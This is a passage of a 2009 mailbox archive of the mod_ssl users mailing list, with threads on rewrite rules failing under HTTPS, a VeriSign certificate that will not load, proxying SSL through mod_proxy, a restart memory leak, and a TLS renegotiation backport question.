	by master.modssl.org (Postfix) with ESMTP id 750F514D83F
	for ; Wed, 22 Jul 2009 15:46:49 +0200 (CEST)
Received: from isper.nabble.com ([192.168.236.156])
	by kuber.nabble.com with esmtp (Exim 4.63)
	(envelope-from )
	id 1MTc8C-0002NR-MR
	for modssl-users@modssl.org; Wed, 22 Jul 2009 06:45:16 -0700
Message-ID: <24606784.post@talk.nabble.com>
Date: Wed, 22 Jul 2009 06:45:16 -0700 (PDT)
From: glowkeeper 
To: modssl-users@modssl.org
Subject: RE: modssl - URL's under domain name not found
In-Reply-To: 
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
X-Nabble-From: steve.huckle@gmail.com
References: <24533884.post@talk.nabble.com>  <24566061.post@talk.nabble.com> 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: glowkeeper 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users


Got it. Well, almost.

It seems that where my https connection was concerned, I was running with
AllowOverride None, so none of the rewrite directives in the .htaccess file
were being processed.

So I've solved this by 'opening up' my development machine by specifying on
all directories:

AllowOverride All
Order deny, allow
deny from all
Allow from 127.0.0.1

I still don't fully understand, as those are the directives I was running
for my drupal install directory already. Furthermore, the .htaccess file in
that directory was being processed and allowing my ordinary http URL's to be
rewritten properly. Obviously https is different 'somehow', so any
explanations will be welcome.

Meanwhile, I can get on and start playing with ssl on my development machine


Mario Brandt wrote:
> 
> I guess the rewriting is not turned on in the SSL vhost. Else there
> should be a rewriting to a php file which works with PATH_INFO
> 
> You may check that out.
> 
> Mario 
> 
> -----Original Message-----
> From: owner-modssl-users@modssl.org
> [mailto:owner-modssl-users@modssl.org] On Behalf Of glowkeeper
> Sent: Monday, July 20, 2009 10:53 AM
> To: modssl-users@modssl.org
> Subject: RE: modssl - URL's under domain name not found
> 
> 
> The error log says (for example):
> 
> [Mon Jul 20 09:40:21 2009] [error] [client 127.0.0.1] File does not
> exist:
> /Library/WebServer/Documents/drupal/electric-heater-info, referer:
> https://devel.cosyheart.com/
> 
> Actually, my original post is a bit misleading - the content is
> delivered via drupal and a MySQL database, not from a filesystem.
> Furthermore, that database is replicated between the devel' and live
> server (so they are EXACTLY the same), and all works just fine under
> normal http. As I said, ssl also works on the live server, but not on
> the dev machine (other than the home page).
> 
> 
> Mario Brandt wrote:
>> 
>> Hi!
>> What is in your error log about that?
>> 
>> Mario
>> 
>> -----Original Message-----
>> From: owner-modssl-users@modssl.org
>> [mailto:owner-modssl-users@modssl.org] On Behalf Of glowkeeper
>> Sent: Sunday, July 19, 2009 9:38 PM
>> To: modssl-users@modssl.org
>> Subject: modssl - URL's under domain name not found
>> 
>> 
>> I am running modssl under apache 2.2.11 on my development server using
> 
>> mac os x 10.5.
>> 
>> I have created self signed certificates using openssl for this
> machine.
>> 
>> https://devel works just fine.
>> 
>> https://devel/directory generates a 404 file not found error.
>> 
>> https://devel/anotherdirectory/etcetc also generates a 404.
>> 
>> I have a very similar setup on a live server that's running Centos 
>> 5.1, apache 2.2.3, modssl and an ssl certificate via Comodo. This is 
>> working just fine - all URL's resolve properly.
>> 
>> I have tried copying the conf' files on the live and devel' server 
>> line for line, but I don't seem to be able to overcome the error on my
> 
>> development machine.
>> 
>> Does anyone have any idea what the problem on my development machine 
>> might by? Any pointers would be welcome.....
>> --
>> View this message in context:
>> http://www.nabble.com/modssl---URL%27s-under-domain-name-not-found-tp2
>> 45
>> 33884p24533884.html
>> Sent from the mod_ssl - Users mailing list archive at Nabble.com.
>> 
>> ______________________________________________________________________
>> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>> User Support Mailing List                      modssl-users@modssl.org
>> Automated List Manager                            majordomo@modssl.org
>> ______________________________________________________________________
>> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>> User Support Mailing List                      modssl-users@modssl.org
>> Automated List Manager                            majordomo@modssl.org
>> 
>> 
> 
> --
> View this message in context:
> http://www.nabble.com/modssl---URL%27s-under-domain-name-not-found-tp245
> 33884p24566061.html
> Sent from the mod_ssl - Users mailing list archive at Nabble.com.
> 
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> 
> 

-- 
View this message in context: http://www.nabble.com/modssl---URL%27s-under-domain-name-not-found-tp24533884p24606784.html
Sent from the mod_ssl - Users mailing list archive at Nabble.com.

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jul 22 15:59:08 2009
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 418B414D9EE; Wed, 22 Jul 2009 15:59:08 +0200 (CEST)
Delivered-To: modssl-users@modssl.org
Received: from nasa30.com (mail.nasa30.com [212.105.204.244])
	by master.modssl.org (Postfix) with ESMTP id 03FE814D83F
	for ; Wed, 22 Jul 2009 15:58:43 +0200 (CEST)
X-MimeOLE: Produced By Microsoft Exchange V6.5
Content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: text/plain;
	charset="US-ASCII"
Content-Transfer-Encoding: quoted-printable
Subject: RE: modssl - URL's under domain name not found
Date: Wed, 22 Jul 2009 15:55:49 +0200
Message-ID: 
In-Reply-To: <24606784.post@talk.nabble.com>
X-MS-Has-Attach: 
X-MS-TNEF-Correlator: 
Thread-Topic: modssl - URL's under domain name not found
Thread-Index: AcoK0qPicN3TXKM1SmSkjRXsorMmNwAALo9Q
References: <24533884.post@talk.nabble.com>  <24566061.post@talk.nabble.com>  <24606784.post@talk.nabble.com>
From: "Mario Brandt" 
To: 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Mario Brandt" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Well the AllowOverride manages what you are allowed to configure in
.htacces=20

Order deny, allow
deny from all
Allow from 127.0.0.1

This manage who can access these server from where.=20
In your case you can only access from 127.0.0.1 aka. localhost your
computer

See the docs  for more details

http://httpd.apache.org/docs/2.2/howto/access.html



Mario



-----Original Message-----
Got it. Well, almost.

It seems that where my https connection was concerned, I was running
with AllowOverride None, so none of the rewrite directives in the
.htaccess file were being processed.

So I've solved this by 'opening up' my development machine by specifying
on all directories:

AllowOverride All
Order deny, allow
deny from all
Allow from 127.0.0.1

I still don't fully understand, as those are the directives I was
running for my drupal install directory already. Furthermore, the
.htaccess file in that directory was being processed and allowing my
ordinary http URL's to be rewritten properly. Obviously https is
different 'somehow', so any explanations will be welcome.

Meanwhile, I can get on and start playing with ssl on my development
machine
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Jul 27 21:27:50 2009
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 274A514DA28; Mon, 27 Jul 2009 21:27:50 +0200 (CEST)
Delivered-To: modssl-users@modssl.org
Received: from mail-fx0-f213.google.com (mail-fx0-f213.google.com [209.85.220.213])
	by master.modssl.org (Postfix) with ESMTP id EC59014D838
	for ; Mon, 27 Jul 2009 21:27:25 +0200 (CEST)
Received: by fxm9 with SMTP id 9so3146351fxm.1
        for ; Mon, 27 Jul 2009 12:25:53 -0700 (PDT)
DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed;
        d=gmail.com; s=gamma;
        h=domainkey-signature:mime-version:received:date:message-id:subject
         :from:to:content-type:content-transfer-encoding;
        bh=V7c5qypDNMQg2tlvvh7twIy30h4F/rlaBmHqeqUxFVM=;
        b=EvicMAyjx5cSWxIPAZd5p2iCh26uh+5Ak9kV0NK+qbZ5yf53U7G/U+EvCTvH3nxeLp
         hr9cat+g7KzumHKv8kRc2fOcrBASUy5IkHV3GkmQHYKwSfvx8nTHdFACQIDYFFAnhI/p
         lfeQ0qwHZllOo2RvsWT7UAjbmoxB4xtIsZzYs=
DomainKey-Signature: a=rsa-sha1; c=nofws;
        d=gmail.com; s=gamma;
        h=mime-version:date:message-id:subject:from:to:content-type
         :content-transfer-encoding;
        b=Jl+zWZZpid1OzomYOM0DUS36YK4YKCwswMSNLbGT7Jc+qraZVGlx4qx7k6JvOHrQHA
         MSZxz0rZlZvwrNlE8h/7lGFMF7H7Jcmejw9bBFr9Df/i+qTzarYaJZT4OJeMDn+ywWnk
         SKKAb2pCHQY2TzSH1imtxOEG4BA0iozYA1P5s=
MIME-Version: 1.0
Received: by 10.204.66.17 with SMTP id l17mr3447673bki.51.1248722753441; Mon, 
	27 Jul 2009 12:25:53 -0700 (PDT)
Date: Mon, 27 Jul 2009 16:25:53 -0300
Message-ID: 
Subject: Issue setting up a Verisign certificate
From: Robin 
To: modssl-users@modssl.org
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Robin 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

I have generated a CSR, sent it to Verisign and they sent me back a
cer file that I have renamed to public.crt.  As per their support
instructions I installed their Intermediate CA
(https://knowledge.verisign.com/support/ssl-certificates-support/index?page=content&id=AR193)

My virtualhost configuration is as follows:

  SSLEngine on
  SSLCertificateFile /etc/apache2/public.crt
  SSLCertificateKeyFile /etc/apache2/private.key
  SSLCACertificateFile /etc/apache2/interm.crt

I am getting this error when trying to start Apache:

[Mon Jul 27 16:05:07 2009] [error] Init: Unable to read server
certificate from file /etc/apache2/secure.canadaeast.com.public.crt
[Mon Jul 27 16:05:07 2009] [error] SSL Library Error: 218529960
error:0D0680A8:asn1 encoding routines:ASN1_CHECK_TLEN:wrong tag
[Mon Jul 27 16:05:07 2009] [error] SSL Library Error: 218595386
error:0D07803A:asn1 encoding routines:ASN1_ITEM_EX_D2I:nested asn1
error

Any thoughts, because I am at a loss and am not interested in wait on
how 35 minutes to speak to their support people.

Thanks!
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Jul 27 21:39:58 2009
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id BE66014DA28; Mon, 27 Jul 2009 21:39:58 +0200 (CEST)
Delivered-To: modssl-users@modssl.org
Received: from correo.gssi.es (jabber.gssi.es [82.144.18.67])
	by master.modssl.org (Postfix) with ESMTP id 547B214D838
	for ; Mon, 27 Jul 2009 21:39:34 +0200 (CEST)
Received: from atila.casa.gssi.es (atila.gssi.es [80.38.252.251])
	(using TLSv1 with cipher DHE-RSA-AES256-SHA (256/256 bits))
	(No client certificate requested)
	by correo.gssi.es (Postfix) with ESMTP id 3E91010027
	for ; Mon, 27 Jul 2009 21:38:00 +0200 (CEST)
Message-ID: <4A6E0217.4030504@gssi.es>
Date: Mon, 27 Jul 2009 21:37:59 +0200
From: Victoriano Giralt 
Organization: G & S Sistemas de Informacion, S.L.
User-Agent: Thunderbird 2.0.0.22 (X11/20090625)
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: Issue setting up a Verisign certificate
References: 
In-Reply-To: 
X-Enigmail-Version: 0.95.6
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 8bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Victoriano Giralt 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Robin escribió:
| My virtualhost configuration is as follows:
|
|   SSLEngine on
|   SSLCertificateFile /etc/apache2/public.crt
- ------------------------^
|   SSLCertificateKeyFile /etc/apache2/private.key
|   SSLCACertificateFile /etc/apache2/interm.crt
I think this does not belong here, but I might be wrong.

| [Mon Jul 27 16:05:07 2009] [error] Init: Unable to read server
| certificate from file /etc/apache2/secure.canadaeast.com.public.crt
- -------------------------------^
It seems your Apache is looking for the cert in a different file than you
think.

Probably because there is a different virtual host configuration for the
SSL one.
- --
- ---------------------------------------------------------------------------
G & S Sistemas de Informacion, S.L.  | Teléfono:  9 02 01 44 43
Victoriano Giralt                    | Land line: +34-952-207-241
Torre de San Telmo, 8                | Mobile:    +34-670-332-720
E-29018 Malaga (Spain)               | http://www.gssi.es/
- ---------------------------------------------------------------------------

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.5 (GNU/Linux)
Comment: Using GnuPG with CentOS - http://enigmail.mozdev.org

iD8DBQFKbgIWWHlx3l8ZumwRAk81AJ9aINiS57WlUCvEpHLboAsERThPdACfTp2f
DZnobVXEnFsucQbkMINLcXQ=
=SRHR
-----END PGP SIGNATURE-----
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Jul 27 21:42:46 2009
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id AAF9F14DA34; Mon, 27 Jul 2009 21:42:46 +0200 (CEST)
Delivered-To: modssl-users@modssl.org
Received: from QMTA01.westchester.pa.mail.comcast.net (qmta01.westchester.pa.mail.comcast.net [76.96.62.16])
	by master.modssl.org (Postfix) with ESMTP id 18B1C14DA30
	for ; Mon, 27 Jul 2009 21:42:21 +0200 (CEST)
Received: from OMTA23.westchester.pa.mail.comcast.net ([76.96.62.74])
	by QMTA01.westchester.pa.mail.comcast.net with comcast
	id LzDp1c0081c6gX8517fosh; Mon, 27 Jul 2009 19:39:48 +0000
Received: from sz0093.wc.mail.comcast.net ([76.96.58.151])
	by OMTA23.westchester.pa.mail.comcast.net with comcast
	id M7jA1c00L3FmDic3j7jACc; Mon, 27 Jul 2009 19:43:10 +0000
Date: Mon, 27 Jul 2009 19:40:49 +0000 (UTC)
From: Lou Picciano 
To: modssl-users@modssl.org
Message-ID: <1851536291.6146701248723649974.JavaMail.root@sz0093a.westchester.pa.mail.comcast.net>
In-Reply-To: 
Subject: Re: Issue setting up a Verisign certificate
MIME-Version: 1.0
Content-Type: multipart/alternative; 
	boundary="----=_Part_298706_1381593665.1248723649973"
X-Originating-IP: [68.37.107.119]
X-Mailer: Zimbra 5.0.16_GA_2927.RHEL5_64 (ZimbraWebClient - FF3.0 (Mac)/5.0.16_GA_2927.RHEL5_64)
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Lou Picciano 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

------=_Part_298706_1381593665.1248723649973
Content-Type: text/plain; charset=utf-8
Content-Transfer-Encoding: 7bit

Robin, 

Be sure Verisign's 'root' certificate is installed in your browser's certificate store - this is probably already done by default. 

Then, verify what this is pointing to (from your own log file): 
Unable to read server certificate from file /etc/apache2/secure.canadaeast.com.public.crt 

Verify that your apache config file doesn't have one of the 'alternate' certificate pointer directives activated. Various configurations 'bundle' certs together in concatenated form, for example. 

Be sure also that your VerifyDepth is set appropriately... Looks like a depth of at least 3 levels to me. 

----- Original Message ----- 
From: "Robin"  
To: modssl-users@modssl.org 
Sent: Monday, July 27, 2009 3:25:53 PM GMT -05:00 US/Canada Eastern 
Subject: Issue setting up a Verisign certificate 

I have generated a CSR, sent it to Verisign and they sent me back a 
cer file that I have renamed to public.crt. As per their support 
instructions I installed their Intermediate CA 
(https://knowledge.verisign.com/support/ssl-certificates-support/index?page=content&id=AR193) 

My virtualhost configuration is as follows: 

SSLEngine on 
SSLCertificateFile /etc/apache2/public.crt 
SSLCertificateKeyFile /etc/apache2/private.key 
SSLCACertificateFile /etc/apache2/interm.crt 

I am getting this error when trying to start Apache: 

[Mon Jul 27 16:05:07 2009] [error] Init: Unable to read server 
certificate from file /etc/apache2/secure.canadaeast.com.public.crt 
[Mon Jul 27 16:05:07 2009] [error] SSL Library Error: 218529960 
error:0D0680A8:asn1 encoding routines:ASN1_CHECK_TLEN:wrong tag 
[Mon Jul 27 16:05:07 2009] [error] SSL Library Error: 218595386 
error:0D07803A:asn1 encoding routines:ASN1_ITEM_EX_D2I:nested asn1 
error 

Any thoughts, because I am at a loss and am not interested in wait on 
how 35 minutes to speak to their support people. 

Thanks! 
______________________________________________________________________ 
Apache Interface to OpenSSL (mod_ssl) www.modssl.org 
User Support Mailing List modssl-users@modssl.org 
Automated List Manager majordomo@modssl.org 

------=_Part_298706_1381593665.1248723649973
Content-Type: text/html; charset=utf-8
Content-Transfer-Encoding: quoted-printable

<=
div style=3D'font-family: Arial; font-size: 12pt; color: #000000'>Robin,
Be sure Verisign's 'root' certificate is installed in your browser's c=
ertificate store - this is probably already done by default.

Then, v=
erify what this is pointing to (from your own log file): 
Unable to read=
 server certificate from file /etc/apache2/secure.canadaeast.com.public.crt=


Verify that your apache config file doesn't have one of the 'altern=
ate' certificate pointer directives activated.  Various configurations=
 'bundle' certs together in concatenated form, for example.

Be sure =
also that your VerifyDepth is set appropriately...   Looks like a=
 depth of at least 3 levels to me.

----- Original Message -----
F=
rom: "Robin" <diilbert.atlantis@gmail.com>
To: modssl-users@modssl=
.org
Sent: Monday, July 27, 2009 3:25:53 PM GMT -05:00 US/Canada Eastern=

Subject: Issue setting up a Verisign certificate

I have generate=
d a CSR, sent it to Verisign and they sent me back a
cer file that I hav=
e renamed to public.crt.  As per their support
instructions I insta=
lled their Intermediate CA
(https://knowledge.verisign.com/support/ssl-c=
ertificates-support/index?page=3Dcontent&id=3DAR193)

My virtualh=
ost configuration is as follows:

  SSLEngine on
 &=
nbsp;SSLCertificateFile /etc/apache2/public.crt
  SSLCertifica=
teKeyFile /etc/apache2/private.key
  SSLCACertificateFile /etc=
/apache2/interm.crt

I am getting this error when trying to start Apa=
che:

[Mon Jul 27 16:05:07 2009] [error] Init: Unable to read server<=
br>certificate from file /etc/apache2/secure.canadaeast.com.public.crt
[=
Mon Jul 27 16:05:07 2009] [error] SSL Library Error: 218529960
error:0D0=
680A8:asn1 encoding routines:ASN1_CHECK_TLEN:wrong tag
[Mon Jul 27 16:05=
:07 2009] [error] SSL Library Error: 218595386
error:0D07803A:asn1 encod=
ing routines:ASN1_ITEM_EX_D2I:nested asn1
error

Any thoughts, bec=
ause I am at a loss and am not interested in wait on
how 35 minutes to s=
peak to their support people.

Thanks!
___________________________=
___________________________________________
Apache Interface to OpenSSL =
(mod_ssl)                   ww=
w.modssl.org
User Support Mailing List          =
;            modssl-users@modssl.org
Autom=
ated List Manager                 &=
nbsp;          majordomo@modssl.org

------=_Part_298706_1381593665.1248723649973--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Sep  4 18:37:11 2009
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id A6C0C14D875; Fri,  4 Sep 2009 18:37:11 +0200 (CEST)
Delivered-To: modssl-users@modssl.org
Received: from mail-yw0-f174.google.com (mail-yw0-f174.google.com [209.85.211.174])
	by master.modssl.org (Postfix) with ESMTP id 3FCD314D839
	for ; Fri,  4 Sep 2009 18:36:54 +0200 (CEST)
Received: by ywh4 with SMTP id 4so1722901ywh.1
        for ; Fri, 04 Sep 2009 09:35:18 -0700 (PDT)
DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed;
        d=gmail.com; s=gamma;
        h=domainkey-signature:mime-version:received:date:message-id:subject
         :from:to:content-type;
        bh=PAwLEEodKQ3boQ6Hjo/a9hSRZ5KQtxhTHigiVQsQqrA=;
        b=dFQHrlEl3uAW5GoX6jJ5UCi90xCi1BS7pH+hMMgRSSwQRm7qmGxiGmn3eYwZdIgvP3
         hv1Q6IdPlFIWXnldODKsJr0bOF3aMIk/UpfEqXBt1UX6fET/r0CYc72a12hzwICwlVkR
         HCQEgk1XN+uqkLAueP3V/IibhIqAtOM75rQO0=
DomainKey-Signature: a=rsa-sha1; c=nofws;
        d=gmail.com; s=gamma;
        h=mime-version:date:message-id:subject:from:to:content-type;
        b=I3N3M7SELAFwsLb6IayCbA/lIg9c/0we1CfjGJNptBnM2TIeGFvYdGkr5BrdgT44D7
         VNgqOa7ubcn4nQqnFk5dkhZo61YSSIZJt8YLXixeU99/YNuY7e7WKSiOu9DqTx3BOg/d
         47RfBs+BGlutyrAuxcH6zrJ/yq2eFeQn/erNA=
MIME-Version: 1.0
Received: by 10.91.214.17 with SMTP id r17mr8344689agq.34.1252082118826; Fri, 
	04 Sep 2009 09:35:18 -0700 (PDT)
Date: Fri, 4 Sep 2009 12:35:18 -0400
Message-ID: 
Subject: using mod_proxy to proxy ssl connection to backend...
From: Carlos Lugo 
To: modssl-users@modssl.org
Content-Type: multipart/alternative; boundary=0016364c6ccdec1b2b0472c31567
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Carlos Lugo 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

--0016364c6ccdec1b2b0472c31567
Content-Type: text/plain; charset=ISO-8859-1

Hello
I'm looking to proxy a site which has an SSL "admin" from a backend server
using mod_proxy and mod_proxy_ssl.
So far, any non-ssl traffic is being proxied perferctly, with urls fixed
with mod_proxy_html.
However, i'm yet to correctly proxy ssl traffic, and am not sure i
understand the best way to go about doing this.
Here's a bit of background:

1) apache 2.2

2) sub.domain.com is 301 redirected to domain.com/sub

3) domain.com/sub (nonexistent directory) is then proxied to
old.domain.com("backend" server) using ProxyPass and ProxyPassReverse.
 This works with no
problem at all.

4) i'm ATTEMPTING to proxy https://domain.com/sub/admin.php to
https://old.domain.com/admin.php using proxy pass reverse, but cannot for
the life of me get it to work.  https://old.domain.com/admin.php works
perfectly when connecting directly from the client (browser), but once the
browser is pointed to the proxy, only non https traffic works.

I've attempted configuring a separate virtual host (this server has a small
handfull) as  but that doesn't work (set
SSLProxyEngine On, AllowCONNECT 443, etc).
I've also tried doing it from the same virtual host that the other (working)
proxy config resides in, but with no success.  I can see a 443 request (in
both netstat and logs) of the backend server, but it's a single line and
never goes any further.

Can someone explain how this should be configured properly?  For some
reason, the info i'm seeing in various messageboard/mailing list threads
always seems incomplete or simply doesn't work for me.

Thanks in advance,
Carlos

--0016364c6ccdec1b2b0472c31567
Content-Type: text/html; charset=ISO-8859-1
Content-Transfer-Encoding: quoted-printable

Hello
I'm looking to proxy a site which has an SSL "admin"=
 from a backend server using mod_proxy and mod_proxy_ssl.
So far, any no=
n-ssl traffic is being proxied perferctly, with urls fixed with mod_proxy_h=
tml.

However, i'm yet to correctly proxy ssl traffic, and am not sure i unde=
rstand the best way to go about doing this.
Here's a bit of backgrou=
nd:

1) apache 2.2

2) sub.do=
main.com is 301 redirected to domain.=
com/sub


3) domain.com/sub (nonexistent di=
rectory) is then proxied to old.domain.co=
m ("backend" server) using ProxyPass and ProxyPassReverse.=A0=
 This works with no problem at all.


4) i'm ATTEMPTING to proxy https://domain.com/sub/admin.php to https://old.domain.com/admin.php using proxy pass revers=
e, but cannot for the life of me get it to work.=A0 https://old.domain.com/admin.php works perfectly =
when connecting directly from the client (browser), but once the browser is=
 pointed to the proxy, only non https traffic works.


I've attempted configuring a separate virtual host (this server has=
 a small handfull) as <VirtualHost [ipaddress]:443> but that doesn=
9;t work (set SSLProxyEngine On, AllowCONNECT 443, etc).
I've also t=
ried doing it from the same virtual host that the other (working) proxy con=
fig resides in, but with no success.=A0 I can see a 443 request (in both ne=
tstat and logs) of the backend server, but it's a single line and never=
 goes any further.


Can someone explain how this should be configured properly?=A0 For some=
 reason, the info i'm seeing in various messageboard/mailing list threa=
ds always seems incomplete or simply doesn't work for me.

Thanks=
 in advance,

Carlos


--0016364c6ccdec1b2b0472c31567--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Oct  8 20:37:10 2009
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 8068614DA58; Thu,  8 Oct 2009 20:37:10 +0200 (CEST)
Delivered-To: modssl-users@modssl.org
Received: from mail-gx0-f212.google.com (mail-gx0-f212.google.com [209.85.217.212])
	by master.modssl.org (Postfix) with ESMTP id 15FE514D839
	for ; Thu,  8 Oct 2009 20:36:53 +0200 (CEST)
Received: by gxk4 with SMTP id 4so7211082gxk.8
        for ; Thu, 08 Oct 2009 11:35:16 -0700 (PDT)
DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed;
        d=gmail.com; s=gamma;
        h=domainkey-signature:mime-version:received:in-reply-to:references
         :date:message-id:subject:from:to:content-type;
        bh=jeMQHzUmdByHf9jABoZMBZ42+uPHXe4OGTdy3YxN22U=;
        b=j5pU1w3QnSAzNw5ICjCSutDAviv8SSjqvzh5b0g8u+IxikaZn9hWeV6chhL89jdHjk
         6AKLodLvT7U+jMDhdSIWr0mzjK0W9cgPSxNaFZXcKkbrQA3c19qTPOVN46U01DY1rs1G
         f5UhenfhFjvNRouamErbQoTpyid+qDTW+2Guc=
DomainKey-Signature: a=rsa-sha1; c=nofws;
        d=gmail.com; s=gamma;
        h=mime-version:in-reply-to:references:date:message-id:subject:from:to
         :content-type;
        b=PgBmncg4tRQ3XKAbVi0iEBP9q7aQkf8fB2163n5AhjdHfAWy+7lcs+TSSzWY+M2PkG
         hW2cyCT+dZGuQVvkqJCMRZ0rb7eXVMKqxo9IoxVXRQ48qA+ZNABHg+A151CGesBbOAyI
         7stqxC5QpP1TFrxY4TTx2ZOU5YbeVHnmQafDk=
MIME-Version: 1.0
Received: by 10.101.121.3 with SMTP id y3mr1769210anm.53.1255026915791; Thu, 
	08 Oct 2009 11:35:15 -0700 (PDT)
In-Reply-To: 
References: 
Date: Thu, 8 Oct 2009 20:35:15 +0200
Message-ID: 
Subject: Memory leak on apachectl restart
From: Gert Cuykens 
To: modssl-users@modssl.org
Content-Type: text/plain; charset=UTF-8
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Gert Cuykens 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

LoadModule ssl_module modules/mod_ssl.so
SSLSessionCache shm:logs/ca(8192)
SSLCertificateFile conf/ca.crt
SSLCertificateKeyFile conf/ca.key
SSLEngine off

dbm shmht shmct does not fix the problem
tested on apache 2.2.13
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Nov  9 17:11:51 2009
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 516DB14DA6A; Mon,  9 Nov 2009 17:11:51 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from mailserver.kippdata.de (capsella.kippdata.de [195.227.30.149])
	by master.modssl.org (Postfix) with ESMTP id DD66214D838
	for ; Mon,  9 Nov 2009 17:11:50 +0100 (CET)
Received: from [195.227.30.148] (larix [195.227.30.148])
	by mailserver.kippdata.de (8.13.5/8.13.5) with ESMTP id nA9GABdr020867
	for ; Mon, 9 Nov 2009 17:10:12 +0100 (CET)
Message-ID: <4AF83EE3.1000406@kippdata.de>
Date: Mon, 09 Nov 2009 17:10:11 +0100
From: Jens Schoenershoven 
Organization: kippdata GmbH
User-Agent: Thunderbird 2.0.0.6 (X11/20070802)
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Backporting Apache HTTPD 2.2.15 Patch for OpenSSL issue
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Jens Schoenershoven 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Dear User List,

is there any plan to have a backport of Apache HTTPD Patch 2.2.15 (as an 
alternative Workaround for the OpenSSL issue about Renegotiating 
TLS-Connections) for mod_ssl in combination with Apache HTTPD 1.3?

Regards,
Jens Schoenershoven
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Nov  9 22:04:59 2009
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id DBA4A14DA72; Mon,  9 Nov 2009 22:04:59 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from frfcqmg011ix3r8.montpellier.mebs.ihost.com (mail2.aspaway.fr [129.35.163.230])
